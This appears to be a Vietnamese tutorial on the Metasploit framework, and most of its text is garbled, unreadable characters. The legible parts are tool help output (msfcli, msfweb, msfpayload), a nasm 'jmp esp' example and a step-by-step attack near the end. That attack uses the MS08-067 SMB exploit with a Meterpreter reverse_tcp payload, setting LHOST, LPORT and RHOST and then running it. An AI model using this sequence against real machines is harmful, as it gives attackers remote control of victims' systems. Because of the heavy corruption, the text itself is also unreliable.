


 !"
 #$
%&'()
*+,-$
+!./01+2
)",-#"31"$
45!6"
+!./"78++9
+!./"!":.
;01<"
+!./!6"
=>?@AB

Mc lc



"CD+AEF+G!9, H#9IJK#
 L#"!
 
 !"#$%%&'#(%)%*+,-#./01%-%2"&34
5%&)6789:;%'#<0.=+*,9>,5?,3@7:"A"BCB
%&0.$BDEFBBB9")%*G1%-H#.
789:0IB537#,;J ;K%B",&L%M%2,
.N%2,)+,=05%&"O,7"J3P;O,7"J3QR;STUV"A
%&" W  7:  #  5?,  3@  7:  %5X  Y0.' 3@7:5 O"&7
B&"33,;)7% 33
 Z4D,), $%

(,8[D%%2,33\#]]^7,_&9>,%,'0+=60(
1,0.)`D,,D,%#"9,3aP2,+b.;""&9ZB""#+c
%& .34Y0I%,)6E:%3B",%d&#J"&D9&3,",#
N e39>,#(%#+,/0f+( H7L
)6%3B",%d&#J"&DgZdh9#(%#Y,/0#(%)
%*J,7"J3+ 8#%2,f%&9%.Y0.'30*%#%&
7,_;#i,5?,+M%0$&Hja%3B",%7"#"Ka>,34&+?,
6Zd]%%" (%,/B+-D,-#%&%"%E%,5#(%0(
#2Z4&#k%.#(%%&"f34D,)%l98I%%&"%?,,
m+b.
 n,>,%,)09=%3B",%
%3B",%0IB#(%=gK&#J"&Dh"l%B%,)
9%4,)D,%L+?,+,-6#(%9D,
%1530j
^

 MI1,H4.gB%,)hj#(%,'W0 !"#$%"A0
IBB%,)&#(%D!\7_ 8%%5X%&"Bm#=#
 MI1KI!4Hg%,/%(hj,'W0 !"#$%%E ""
0IB
 9K.IIgBb%Nhj,'W0"Af5?,D
%&'%"%/,>, k%+m0Bb%N+-Y+8D!\
D,%6111%-+5FD,%.DE.D,
%%eY,=07,6+"2#cD,%+5F%,'#9"
n,,+"2.G "M#9,)o,W7:7_ 8%
%5X
^ (NJK#OH,HKJPH#gB%%&,-D,%hj#(%b0%&!J",K"
fb0p,<0%&i+c+5FY+8;<0%&B%%&,-
D,% k%+m0q,=0.+L,p,34,-0 ,/%9=3b03k9=
%,6 (Y@r;#c33# .;+8s"KK3%3;9B."7

R HI#+gD,-#%&hj+b.,,+"2"7&D,-#%&#cD,
%+*,9>,=%!D0;1,789:g3&9,BDh;
"A"A !9,9%$#N1%-+*,9>, (Y@r
D0
t QHKH9IHgB%hjZ0D,D,%+5F%@,)#9
%E3*:%-m%,/%"1%4%,%E+c+5FY
+8;"7&3uB%D,%"A&,'%5"A%&'7,_+
E(Ps%"!;D,%3u+5F%,s
%3B",%#(%74 !"#$%#.%N0IB%E%,9=9I
+= !"#$%G5,lB+o9=D,-#%&Yb#$B9B%%&,-)
%*B%,)Yb# $B(%74"&I%, %,/6%3B",%
%3B",%d&#J"&D
R
%3B",%d&#J"&D#(%#E,%&5?7v+-D,-#%&;%IE9
D,%,63&9,%3B",%+5FYb.74%&'Ef5>
+*,%5F&;9>,f"#B"%3+5F9,/% H;33# &9.%"
%3B",%1%-2.%&'m0/%)+,=0j,0Y;O,7"J3;wZ
l%1%-7"J"75X%&%3B",%%2,JJJ#%3B",%"#
%3B",%+c+5F%NFB3x%&"[D%&DRy,' !#>,I%
6%3B",%9^Q
(%3*2/6=%!.j
• ,"7,)%&0.$B%eY63!Bz#.;6./0#3K,9
#3KJ ;DE0IB I%D#(%Y%45?,7v%eY";
91%-7{+/D,%3,
• |ED,%"%&'=J 
 H#9IJK#R49PHS4T
 |,/%&l6%3B",%d&#J"&D
 !"#$%&"'$
f%BmN%&"D,/%&l6#(%d&#J"&D "M#j
t

 QHNj%BmX !I%6%" (D,/%&ld&#J"&D
yY9,/%%k%6y0 .}Y%3,", &&.;#(%%$BFB>B;
#"701%-+5F3@7: ~,B%%&,-+-B%%&,-
74"AE:"Zdg%3B",%d&#J"&Dh
 R49PHS4T4HgD0•,hj "M##(%%$B)%*"
5#"70<0!r;<0!rB,';34D,)+,=0B*,€•,
G0IB"%#(%,"7,)%>,#"70;%,)N 30
6d&#J"&D|0•, "M#j
• Datastore: +5F,-05#(%#E,%&5?;1 "M##(%
,%&8 \#1%-+5F3@7: ~,#"70%#,/0
+/5X%&. H,%&8+,=0D,-[,/
#E,%&5?#(%%&"f,%&859$.;1+5F3@
7: ~,#"70D,%. ~,K&#J"&D+-Y
+8NY9,+5F%4,)
• Event Notification g%E "34D,)hj"BCB
B%%&,-+5&+(:%-9>,%e34D,).
+(Y!.&,#(%34D,)3u1#(%%WY@r
%5XW9>,1
• Framework Managers:1  ,)#  9:  <0!  r   #"70;
B0,;333,"3;•" 3
 R49PHS4T9IHgD0X3~hj+5FYb.7474%&'D0E
D6D0•,;0IB,"7,)+-1%-7_7%4%,
•,(%3*D0X3~j
• Configuration: 70.%&#(%I0,'%:9%0%$B
%E%,9=I0%&l6%,/%&,+A%;‚25%5
#:*6<0%&,+A%.%0(%ND
• Sessions:f%E%,X !9=9,)70.%&;D,-#3"%
9,%&"B,'#9,)65?,7v
• Logging:#(%%,)N6Zd"BCB,2,%E
%,;,;o,#(%%<0%9,"2%

ƒ
 %0$%f%5?7v
(#$")*#(%#.<0C%(, (6%3B",%B*,FB#B9
#"70&,' ,)%6%3B",%+-<0C%9%&0.%#"/0DE1
YB"3"ADE%-<0C%7f,)0+-$B9"%3B",%"##0,%.; 2
1%-2.%&<0C%+-B%,)9%0%$B%E%,6"
+,$gD,%hW\N6Zd;,lB%%@,)#D,
%Bm#=#,#(%#"700IB#(%B5X%WD,
%;9+5FBb"2,&•&+*,9>,%e)+,=0G5B,' !
Bm#=#,)D,%%E%5?749"f+,-#./0.AB5j
,%& (+)#;,%&'W7:J gZ„T•%,";UZZ€h;,%&"
<0%&I0;%&,-D,)%*P9N7:D,%#(%,:%-Pe,"
7,)J 6Zdi}YB",%3
-.$/'"0 !"#$
P&"@3}YB",%#"703;i#(%YB",%%#0*%@,)#
D,%N7:~+b.%%@,)#D,%,,&"3"K%Z&9&Z&9,
y%,9%Z%D"&&0B%,"DB ,/6J,UZ
1")%*#%#0*D,%P0$%f"1%-+5F
,-0#(%#.%&2#+($B;#(%:##.%&2#;#(%7!,#2.%" (
#(%#2
…
2)$/g%!,%&ih#(%+"2#c+5FYb.74+-)%*%4%,
."7.+5F4i90IB ~,d&#J"&DN7:#(%""#"
#"#(%B."7;1%2"&#(%D/%*,%e#.2b%>,#.6D†%I
E;D†%IE1%-k9=#.%N2b%E<0D/%
*,(%B."7G1%-+5F,-0+X,!#(%3*b0)+5F
%4,)%&')+,=06#.2b(%3*B."7%5?+5F3@
7:B ,/530j
3!4#52)$/6#7/8
*"#(%,"7,)+,=0D,-;+5F0IB+- 2%4,)%&0.

$B%eY9"#.2b
*"$/"#(%%$Bb0)+5F3@7:5#(%B."7D,%4
,)D,%*"$/"%5?+5F9,/% HFBfg33# .h
!$/9"#(%Bm#c+($B.1%-Bm#=#H##~
&(W\6%3B",%d&#J"&D;"BCB 2%4,)+5F,=0
Q
%WX%&"<0%&D,%(%#"701%-#(%YB",%;#(%
B."7DE"2%+(€"2,6#"703uY+8+5F#:+N;W
\61N7:;#(%#"70"BCB#~&#(%#"%&'#.2b%
+1+5F",#(%#"70YB",%
:#""gkh+5FY##(%%Bm%&"%3B",%;+5F
7v+-%4,)?#(%D/%*,N7:j30D,#.2$ 8D,%;1
1%-+5FD-%*,+/#.%IE%E<0#2T%&%:#"".3u
Y@rD/%*,9?%&'#.%IE+-1%-+5FD/%*,2,9>,0
H)%*D,%
!""""#(%B."7%,'%,/+W\;0IB"l%
#(%3%5X%%e%&B&%&3l%1%-#f9,)5%!,
9=#(%%$B%,;I.+5F#c36#$%Dz06%,D"!5?,7v;.
Yb#$B9")%*#2%&B&%&2.%&' (>;99$.1DE
%- 8B%,) ~,m0/%)%*B%,)Yb#$B
1##(%+(#%3B",%"##0,%.1%-%4,);‚
25#(%#.<0C%;%IE &0%K"&;D,%;"A%2" ""
2$;" "M#%&%;%3D; ""97f,)0;#(%Bm6D,-#
%&Yb#$B(%$;"+2,7,)"#(%DE,#9,)# 23@7:
+-D,-#%&Yb#$B9I0# i,D,-#%&Yb#$B+=02.%e
%&"#(%$;"
9"0)#(%, !"#$%"A+,-#./0%&"#(%W7:.
)%*#3u%&~%#:%,'06fD†%IE(%)%* 8Yb#
$B1%-7{+/ 8#I%<0.=D,-#3"%;%IE%e*,789:;%&0.$B
7f,)0%&,BCB;+kB#$%Dz0;9%& (+)#

<9,"#W\#>,+5F 30%eB,' !9]; 30
#"70"9,)%#D,/#;%0%$B%E%,;%$#N7L%#
gK0‡‡,h9>,Bm#=#
 n,"7,)6%3B",%
%3B",%0IB"l%,=0X#(%,"7,)+-%4,)
W\X !61n,"7,)6%3B",% "M#!,"7,)
]
+,=0D,-;7L).+Mi",&;,"7,).%,)N6
%3B",%d&#J"&D%5?+5F0IB%&4%,/B%E<0#W
\f%,)N.1%-&I%f07:"9,)B%,)D,%
6)%*#DEm3@7:%" (d&#J"&D
!#=$#$"+/.+5FY##E,%&5?#9,)B ,/I%6
%3B",%d&#J"&D91+5F+,"qb.#E,%&5?#9,),
"2%;9>,,=0%N\B"Bl;D!\0IBE:%&Ff0
7:"<0%&D,%3K"3"0IB%I%!%&"#(%,"7,);
m0/%%v.i9%,/%$B13x%&"d&#J"&Dl%1%-3@
7:%I%!#i,%W; "M#9,)'D/"2"<0%&D,%;%!,
#"70%&F;%4,)+,=0%&.%2"#(%,3%&
q- k%+m0#9,)%&',"7,)!*%$#$"%1%-3@7:)
cd /opt/metasploit/msf3/msfconsole;9%+5F,"7,)
#3@7:530j
>.$/!*%$#$"
!#=,"7,)"BCB2.%&4%,/B7L);"BCB0 
5>+m0&%eE:D9"3K,9"D/%<0!&%&'E:

D10IB#(%3*%&F,lBX !+-5?,7v ,/%+5F/+(
#9,);%v.i.,1%-D,%+5F9>,b0)&#=?
root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name><option=value>
[mode]

====================================================================
==========
Mode Description

(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
root@bt:/opt/framework3/msf3#
!#='"0,"7,)+Mi%&'J 13x%&"Zd1DE0
IB  %N  \ !"  #$%;  9  +5F  D0./  DN  3@  7:  %&'  #E,  %&5?
O,7"J3q-1%-Y#%v.i%5XW9>,#3KJ %1%-7v
)30msfweb –h:
[root@RHL framework-3.0-alpha-r3]# ./msfweb -h
Usage: msfweb <options>
OPTIONS:
-a <opt> Bind to this IP address instead of loopback
-d Daemonize the web server

-h Help bannerww.syngress.com
-p <opt> Bind to this port instead of 55555
-v <opt> A number between 0 and 3 that controls log verbosity
",&l%G1%-D/%*,+/#.2b%E<0
%&70.)%J g"‡,d,&K"Y;T%&%}YB"&&;ZK&,h

!#=/"BCB#~&#(%,"7,)#2%&'#3K"3"P1%-%4
,)#3K7. HY+8+8sT9B"&%6#.#l%#0*
D/%*,%>,+-%4,)D,%q- ,/%%v.iW9>,#3K7%1%-
%4,))msfd –h:
@1A)B$&#=/
<&" 6%3B",%,"7,)+Mi%5X%9>,5?,7v
+5F%2" ~,yB07n,"7,).DI%5F9>,,=0%N\
B"Bl;+729#,_BN"5?,7v
q-D~,+(+5F,"7,)<&"%2.7L)armitage:
root@bt:/opt/framework3/msf3# armitage
",&l%1%-4i<&" H4i%&',"
7,)+Mi93u+5F,"7,)3@7:530j

C!D$/&"E&"9 F1
G.$/<&"
%3B",%0IB"5?,7v,#E,%&5?#9,)f0Nj
^
• n" }9,&"#%jb0)+5F%4%,%E<0)3%
903%;f"B%,"3+5F~+b.3u#%N%":;
+5F+59"%I%!#"70YB",%3
• P#B"&&.}9,&"#%j+5F%4%,%E<0,)3%9
03%;#E,%&5?.s+5F+59"#"70YB",%3++5F
%4%,;1DE!5~+/#"70YB",%3D
l%1%-502,#E,%&5?#+cI0%E<0)39
E,%&5?+13u+5F50%&"ˆ#3Kˆ"K,93u+5F%!,'%4,)%&~2,
D,,"7,)5?,7v%4,)1
^ b0)%&"#3K"3"
F j).7vD, 2#0*%"%&Dp,#"70 2+ci
%&5>+130D,"%E9,);"A#0*0 3#"70D
H").,lBD,-#%&Y#+cI0+l"YB",%5

"% ,/%D/%<0!#DEmB!,%4%,YB",%+15DEB!,%I%
!YB",%+=0%&F).
H$").+-D/%*,%>,#(%"3%9>,+8s,B9B"&%%5XW
I=$" ,/%f%E%,6#(%#"70.#(%YB",%"+1
,-%8%E%,X !I%; "M#"B%,"m%,/%
I0)."BCB%"%%&'#E,%&5?6&0 .
J$0#)." ,/%#"70+2.
:$/).+-"7#(%B0,%e#%3B",%B0,3
*",lB%%#D,/#YB",%;0Y,,&.;"7&g%&"+11L
%&F#(%3*D.J"&7,lB!,%,/D!\%#D,/#5j
|.J"&73j
• #j"703J,%#%,73&,B%,9#
• B%j"703J,%#%,B%"&&K&#
• B%K"&#j"703KK%,%,3B%K"&#
• B"&%j"703J,%#%,&#"%B"&%
• %.Bj"703"K3B,K,%.BgYB",%;0Y,,&.;"&B"3%h
• BBj"703%%&,%"&3&9&%%D3
• 0%"&j"703J&,%% .%,30%"&
R
• 9j"703J,%#%,}T
• ,7j"703J,%#%,[0%&<T
• "397 j"703J,%#%,wZ[T
• 7 j"703J,%#%,}YB",%‰[T
*"##$#).,)%D'%I%!333,"+%M%2,;333,"~+b.1
%-63"A#%&B&%&
*")"BCB%I0YB",%€
K#"5F2,9>,)#"
*"%&"<0%&%4,)%IE#(%#:%,'0;"A,=0#:
%,'0;%1%-7v#(%YB",%"A,=0YB",%).1rŠ%"
:;Š11,)049>,%I%!YB",%

*$' )."BCB,)%8%v.%"%#3*+,%"1/0
`3"Ja%1,-%8%I%!#"701%&"#%B",%K&#J"&DL
/0`3"JYB",%3a%1s,)%8YB",%1%&"#"70YB",%#
%E,P5X%45#"70D;)3"JL"%%I.%#3*
%0(%N
K#").+-i97v#(%YB",%;0Y,,&.€
%$B)%&" B."7#%&B&%& j
• %#"BCB0B"797"J"7K,3%e&#"%#,
• L" "BCBY#%E%,#26&#"%#,5T;
&"0%% 
• 2$"##"BCB%2"B&"333#>,%&'&#"%#,
• *)#j"BCBY#%E%,)%*6&#"%#,
• Z@7:b0)j
• 9#"M&&$/9"N&$/9"N&$/9"-OMPOM/P
b0)037v+-"7f#"70#~&(6#%&B&%&5j
d3;%;&"33
• $/0M=0)OM"POM/"Pj"BCB"7%59,)
6&#"%#,3
• "/  "Q/  O"P j  "  BCB  Y#  7f  ,)0  6  &#"%
#,%&'+D/%*,
t
• '""Q/"BCB,7f,)0'&#"%#,
• $#""Q/j+1#+cD/%*,9>,&#"%"#B0%&
• ""Q/ [k%+m0#(%B,'#9,)9>,9e
%,/%$B9>,&#"%#,
• )"O&""#Pjc"7f,)0+5F@,,f"3%
9&#"%#,
• //"$)j,*)76"##7,
• "'/j" ,/%%5#:+#9,),)%2,
• #O="Q#Pj,)%D'%5#:9%$B%,

• 9$/#O#P/#j0B"7K,
• /$'$/#O#P/#j7"J"7K,
• Z@7:#"70+-Y# !+8%0./6&#"%#,j
L"
I$=
R$9"
• $='/OMPOM://POM$POM$#POM$PO
M2Pj"BCB%2"B"&%K"&J&7,f"3%9&#"%#,
• Z@7:#"70&"33j
","9"M=="OM#POMP
b0)Y0%"BCB 2%2"&#(%B&"33#>,%&'
&#"%#,93@7:B&"33+1+-D,%7f,)0
• ///- j 0‹fB&"333+2.%&'#.
&#"%#,
• #j,)%D'fB&"336&#"%#,
• Z@7:#"70Z.3j
"9/j" ,/%03&#,)%2,6&#"%#,
#)#=$j" ,/%%E%,9="#B0%&#;wZ
R %,)N%&F%&"%3B",%
ƒ
%3B",%L%&F%'#"5?,7v%,)NB:9:%*%"
<0%&%4,)D,%f%,)N6%3B",%+5F0IB"
5?,  7v  %&4  %,/B  %&'  ,"  7,)  9>,  f  %N  \  +A  ,)%  6
d&#J"&Df%,)N.0Ef0N%&"%&5?FB%4,)
D,%+A ,)%
!#=)$/   #(%  %,)  N  6  %3B",%  "  BCB  l  %  %2"
Z"7;#c%4%,9,=0Xf"9,)%4,)D,% '
",d&#J"&D,Z"71%-+5F%2"&9>,f+872D
05j;y0 .;Œ9Z&,B%;.%$#N!,30[3,"W
7:Z0D,l%+cY+8&•+5F+m0&#"#0*;%1%-%4

,)•%&4%,/BB."7+19"%$B%,P+-DN"2%9%4,)
<0%&D,%q-Y#+5F%,)N1%-4i"9,)D,%;
l%1%-3@7:)msfpayload –hj
root@bt:/# msfpayload –h
Z"7+5F%2"& ~,#3KB."79>,+m.+6#i,W\;5
%&"+11W#(%3* .%05ŽY]]ŽY]ŽY]7+,=0.3u%2"&
#cD,-#%&%&5>D,%4%,5X%&.B9oI0%&lB."7",
&;3"73u+,<0#(%#25>,#275>,72&%Y%59$.+"2
#c%4%,.1%- 8B%,) ~,)%*TZ.Bm#=#*
9,&03q-,!,<0./%9I+=.;B%%&,-6%3B",%0IB
&#="$/";1%-,lB+"2#c%4%,6l%%&+5F34B%,)
6)%*TZ.Bm#=#7,)%9,&03 H#c1+"2#c
+1 +-  l  DE  L  1    Dr  %4  `%M,a  l  %  1 %-  $B  )
msfencode –h+-Y##(%73%v.i6&#="$/"
P,)  N  3#•3&  1  %-  7v  D,  l  %  #0*  #  "  #c
33# .1rŠ;+A ,)%%&"D,B%%&,-D,%;l%mY
+8"B"7g%$B)#.h+-+5"%&"b0)33# .
N7:jD,l%2.E:9.'0m0#c#.6)jmp espj
root@bt:/opt/framework3/msf3/tools# ./nasm_shell.rb
nasm >jmp esp
…
00000000 FFE4 jmp esp
 U!.#4V"T"9#"W1,LH#9IJK#
q-%4,)D,%6 I%D•#(%#.";%1%-%4
,)%E<0 5>X !30j
ST9)&U!"#$
 X4P9#9#"H4+gP0%$B%E%,hjl%1%-3@
7:E:5,3"9&.3;YB"33.#(%E
:+5F0IB ~,%3B",%"##0,%.+-%0+5F#(%
73#:%,'01%-D,%.789:+2.;

+#~+-D/%*,+5F+/#.2b
 (NJK#9#g|,%hj%4,)D,%l%1%-3@
7:#"70,lBD,%%4+(.%4,)D,%
%6E+-D~,+(#(%0(%IE+/#.2b
",&;%1%-%4,)0(%IE"%+A<0.=
.%&0.$B%eY9"#.2b
 I#Y(NJK#9#gZ0D,%hj1%-3@7:%'#E
:D+-%0%$B+5F%'#%E%,%e#.2bg%e+11
%-I.+5F%E%,#$%;.%E%,9=+,-#./06)
%*##.2b+%#,h
^ QHJ4#+g[""hj3@7:E:,lB ""+-%2"&
#(% "",%,/%D/%<0!D,%+5F%&'#.2b
R KH9+Jg#32hj3@7: I%D•#(%E:SB
"+12,%I%+5F#~&+-%4,)"#:%,'0
D,%%&'#.2bgDE,B:2,,+A%*%&'
#.2bh
^ =#IZ1+1[T"9#"W1K\"F+]*P^#
^ "&T#B%
Q
"&T#B%+5F%NFB9"m0/%#.<0C%;"BCB
l%$D/%<0!<0C%9%4,)D,%+-D,-#%&;Y+8
q- !"9),)0<0!)%*;l%mB!,1,/5F<0!r
%*%;B!, "M#%e<0C%+/DkB:$0<0!j
• „0C%#.6#2;#.%&2#;%5?@;%,/% 8+8%0./
9W7:D0"
• U+8b.&#*,+7i%434")%*#2
6l%
• U+8%+(%,=#%6#%D,%
+5F
• ‘0%,'9%4,)f4DkB:$0<0!

"&T#B%+5F"#(%E:7v"9,)D,%
X%#D,/#11D!\%4+($B$%fD,
% !"#$%g}YB",%3h,).;#(%B,' !"&T#B%1,
D"!]]]]SZ
^ 93
93#(%E:D,%%5X#2,%e9,%6
T##0,%.3;%,/%D/9>,D,/%&l#~"BCB+BW+5F0m0
&,'D,D,%,)%2,1 "M#X^Q]YB",%3;%&0 #,%
%'#^YB",%%&FD,%%&'%I%!=%!;W7:B ,/
",&;93L"BCBl%#0%'#f#"70D5
,30ZB",%0,"BCB%4,)%"%,)0<0!%&',"7,)+M
i;"BCBD,%,‡&"‰7.
]
^ 3303
[+m0;3303#(%740M#~`3303&"•%a;+5F+=Y0I%
~,y07&,3"9"\#QQ…;#c0M6%Bm+=0+5F
ED,gB,' !3303%&~9=%&5>hPe%]\#]]R;
P %J"&DZ0&,%.;#(%E%.7"y07&,3"+M3$B+c
B%330375>,72#c0M+133031%-2.%&',=0
=%!)+,=0D0; "M#!STU;TSU;wZU;
O,7"J31E:%#D,/#+5F%4,)%"s7{6
B0,

"CD+?EU!_#,"9#"W1K\"F+,LH#9IJK#
 "V"T"9#"W1
!V
qb.#(%%IE+5F%4,) '%&"#2g"&
%J"&DhP&"%&';D†%IE3u+W~#.Qt…3u%,/
%IE9D,%,%&'#.1+8sQt…Y"+1%&"
#2

P&" "".;1#3u3@7:,Z]…•]tƒ•%B,g}‰]]…‰
^R]hqb.#(%Bb%NlBB%&"#c+5?7{ki6
%T76#.6789:1%-"BCBD†%IE%4%,#c%e
Yq- ,/%%'#,%,/%9=.%1%-•)30%&"#%3B",%
>use exploit/windows/smb/ms08_067_netapi
>info
• „0C%)+,=07v&"
P1%-i&"%&'#06[D%&D575>,j

!D&"EF1
"AG1%-7v)30%&'@37L)+-i,&"
armitage
Z0D,,"7,)6 &" +5F $%';%i%&'#06
5X%&530$#W&#W#X*(B%"2,,)'%$B9"
+8  s  T  6  #:  %,'0;  1  %-      7!,  "A  #(%  +8  s  T
N7:%$BjQt…]ˆ^+5F530j

-*9Y9Z&)$&[
 W1K"`Ca1IbO[+,G!W#4V"T"9#"W1
 %3B",%/+(7L)
q-9"/+(7L)%•j
>msfconsole
q-3@7:",$%7v)j
>use exploit/windows/smb/ms08_067_netapi
P,/B%"%i)$/%NFB+-7vD,%j
>set payload windows/meterpreter/reverse_tcp
’+b.%i)$/.%#.%IE3u~/+(?;
?D/%*,+/%e#. 8%IE
P,/B%"%7v)3"J"B%,"3+-Y#%E3*m
%,/%")$/9",$

>show options
Z0D,$B)%&'%%3u%I.+5F%E3*m%,/%
5$#N$N$#N$N"
^
$#q8sT6#.%IE
$%&'#.%IE+-kD/%*,
$#q8sT6#. 8%IE
$789:%&'#. 8%IEg#A+8%&"",$
.^^Rh
")+,=0 8%IE;#A+8+-%4+(%#
>set lhost 192.168.1.12
>set lport 4455 (đặt tùy ý)
>set rhost 192.168.1.x
%#3*L2,%+-#A+8
0*,v•)",$+-%,/D,%
>exploit
 %3B",%%&"/+(+Mi
1#3u3@7:&"%&"Bm.n•7L)75>,+b.+-
D~,2.&"
>armitage
q-Y#,%,/%9=9,)D,%,%&'&#=$#$"9&"#?,
2Y#9,7"7#"+,D•#9>, !J"&7
 c#G!*I9!T"T"9#"W1
Z0D,D,%9>,&#=$#$"%+c,/#+5F<0.=+,=0D,-
6#.9,%,#;5^75>,+b.
R